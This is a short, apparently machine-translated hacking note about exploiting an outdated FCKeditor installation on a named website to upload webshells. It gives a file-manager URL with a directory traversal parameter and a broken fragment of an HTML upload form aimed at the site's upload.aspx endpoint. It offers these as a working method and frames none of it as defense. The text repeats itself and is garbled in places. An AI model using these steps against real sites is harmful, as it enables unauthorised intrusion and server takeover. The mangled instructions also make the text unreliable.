There are still a lot of people using this program, and few vulnerabilities are published, but fckeditor has many vulnerabilities. This program uses an earlier version of fckeditor. You can directly upload webshells. The IIS resolution vulnerability is saved in many ways. The test is as follows: http: www. tmdsb. comcontrolsfckeditoreditorfilemanagerbrowserdef
There are still a lot of people using this set of programs, and few vulnerabilities are published, but fckEdItor has many vulnerabilities.
This program uses an earlier version of fckeditor. You can directly upload webshells. Connect to IIS
Resolution vulnerabilities are saved in many ways.
The test is as follows:
http://www.tmdsb.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx |
If connector. aspx is deleted. The following code is available.
rm
id="frmUpload" e
nctype="multipart/form-data" action="http://www.tmdsb.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">Upload a new file:
|
Save the secret code to test.html and you can directly upload sehll.